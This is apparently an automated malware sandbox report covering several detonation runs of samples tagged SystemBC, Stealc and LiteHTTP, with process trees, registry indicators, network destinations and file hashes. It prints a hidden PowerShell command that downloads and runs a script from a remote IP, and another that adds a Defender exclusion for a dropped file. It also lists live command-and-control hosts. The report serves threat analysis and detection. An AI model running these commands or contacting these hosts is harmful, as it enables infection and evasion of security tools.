"C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
Network
Files
C:\Users\Admin\AppData\Local\Temp\EBE5.tmp\EBE6.tmp\EBE7.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
memory/2160-6-0x000007FEF662E000-0x000007FEF662F000-memory.dmp
memory/2160-9-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp
memory/2160-10-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp
memory/2160-11-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp
memory/2160-8-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/2160-7-0x000000001B5B0000-0x000000001B892000-memory.dmp
memory/2160-12-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 123a8dceee35e6d67f2ef09bd6a5a475 |
| SHA1 | d1770deaf44cad6b7324d9412fe89d514672d4a3 |
| SHA256 | 9c578d1a8db2196df672f942e5bd51e74f9cbfc0716a311c971ef83838595765 |
| SHA512 | 1c81ce4e932a73d5adaa053c0938586e3c7291c99a063b7ce6dca2a2754ce2b64fab31b9ba1a8b3e07c18302a3a924d3a5a2d66eb33211a2a4cfd17eef906bd0 |
memory/2160-13-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
79s
Max time network
146s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
"C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4120-0-0x0000000002CD0000-0x00000000030D0000-memory.dmp
memory/4120-2-0x0000000002CD0000-0x00000000030D0000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
142s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe | N/A |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
| N/A | N/A | C:\ProgramData\hxrnhkv\xogrd.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe
"C:\Users\Admin\AppData\Local\Temp\d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454.exe"
C:\ProgramData\hxrnhkv\xogrd.exe
C:\ProgramData\hxrnhkv\xogrd.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4260 | towerbingobongoboom.com | tcp |
Files
memory/2944-0-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-1-0x0000000077BA4000-0x0000000077BA6000-memory.dmp
memory/2944-2-0x0000000000401000-0x0000000000403000-memory.dmp
memory/2944-4-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-6-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-7-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-8-0x0000000000400000-0x0000000000840000-memory.dmp
C:\ProgramData\hxrnhkv\xogrd.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2648-11-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-12-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | b1f4fa9535c2775dddebf3da01dd02cb |
| SHA1 | 9a709c06ec9b4657fa00cbfd04a5ccecb45ce683 |
| SHA256 | bcd2759ef7b7a76e617c0ba2cf583041cf6c895666a66ed29d1912372b4bf30e |
| SHA512 | df9fa75d43846f02e6cdb5d385d3562d0a58c8f17ec5f5c4b94f1b4938ee0ff1344df450f7fe07ad2da3cab3ec82d061d1f1f842bf50e56bec709f636d56e769 |
memory/2944-14-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-15-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-16-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-17-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-18-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-19-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-20-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-21-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-22-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-23-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-24-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2944-26-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-27-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-28-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-29-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-30-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-31-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-32-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-33-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-34-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2648-35-0x0000000000400000-0x0000000000840000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
124s
Max time network
145s
Command Line
Signatures
Stealc
Stealc family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1928 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe
"C:\Users\Admin\AppData\Local\Temp\351e31a389d6b59faf9842f34bbc27bab411ad796e187b98fb5c59361346a815.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1928 -ip 1928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 800
Network
| Country | Destination | Domain | Proto |
| NL | 185.201.252.32:80 | 185.201.252.32 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1928-0-0x00000000752AE000-0x00000000752AF000-memory.dmp
memory/1928-1-0x00000000006C0000-0x0000000000704000-memory.dmp
memory/1928-2-0x0000000005430000-0x00000000059D4000-memory.dmp
memory/1928-4-0x00000000752A0000-0x0000000075A50000-memory.dmp
memory/4172-5-0x0000000000400000-0x0000000000650000-memory.dmp
memory/4172-7-0x0000000000400000-0x0000000000650000-memory.dmp
memory/4172-8-0x0000000000400000-0x0000000000650000-memory.dmp
memory/4172-9-0x0000000000400000-0x0000000000650000-memory.dmp
memory/1928-10-0x00000000752A0000-0x0000000075A50000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win7-20241010-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe
"C:\Users\Admin\AppData\Local\Temp\a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a.exe"
Network
Files
memory/2856-0-0x0000000001FA0000-0x00000000023A0000-memory.dmp
memory/2856-1-0x0000000001FA0000-0x00000000023A0000-memory.dmp
memory/2856-3-0x0000000001FA0000-0x00000000023A0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
100s
Max time network
150s
Command Line
Signatures
LiteHTTP
Litehttp family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\gGHmO5nH\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 1336 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3356 wrote to memory of 1336 | N/A | C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe
"C:\Users\Admin\AppData\Local\Temp\df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\gGHmO5nH\Anubis.exe""
Network
| Country | Destination | Domain | Proto |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 150.171.27.10:443 | tcp | |
| US | 150.171.27.10:443 | tcp | |
| US | 150.171.27.10:443 | tcp | |
| US | 150.171.27.10:443 | tcp | |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tcp | |
| US | 150.171.27.10:443 | tcp |
Files
memory/3356-0-0x00007FFCAC8E3000-0x00007FFCAC8E5000-memory.dmp
memory/3356-1-0x000001E6DEFB0000-0x000001E6DEFC2000-memory.dmp
memory/3356-2-0x000001E6DF350000-0x000001E6DF360000-memory.dmp
memory/3356-3-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/3356-4-0x00007FFCAC8E3000-0x00007FFCAC8E5000-memory.dmp
memory/3356-5-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/3356-8-0x000001E6F9AE0000-0x000001E6FA008000-memory.dmp
memory/1336-20-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-19-0x0000023E0DA70000-0x0000023E0DA92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3vcaq2g.dn5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1336-21-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-22-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
memory/1336-25-0x00007FFCAC8E0000-0x00007FFCAD3A1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 00:51
Reported
2025-03-06 00:54
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\tjdkln\ermh.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\tjdkln\ermh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\tjdkln\ermh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
| N/A | N/A | C:\ProgramData\tjdkln\ermh.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe
"C:\Users\Admin\AppData\Local\Temp\1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\ProgramData\tjdkln\ermh.exe
C:\ProgramData\tjdkln\ermh.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 104.115.34.42:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4266 | towerbingobongoboom.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2840-24-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-26-0x0000000077AE4000-0x0000000077AE6000-memory.dmp
memory/2840-27-0x0000000000401000-0x0000000000403000-memory.dmp
memory/2840-28-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-31-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-32-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-33-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-36-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-38-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | e28cdaad92fc263cef7f0db464eddce6 |
| SHA1 | a602433ff5456cc62c2e318ca1387afc32814d57 |
| SHA256 | 7044e6c29a3b9101569631d080f5374ea5a68c2df16d46f66dd2b3202e3f17b5 |
| SHA512 | 85876fe2685f3923b95182bb25f3b3f1f73c34450193ccae65b85653278ef0c7d9c5a0763e96c7e7107005ee8155e47753b6304b9607f747f1bde36d1fbafb67 |
memory/2840-40-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-42-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-41-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-43-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-44-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-45-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-46-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-47-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-48-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-49-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-50-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2840-51-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3028-52-0x0000000000400000-0x0000000000840000-memory.dmp
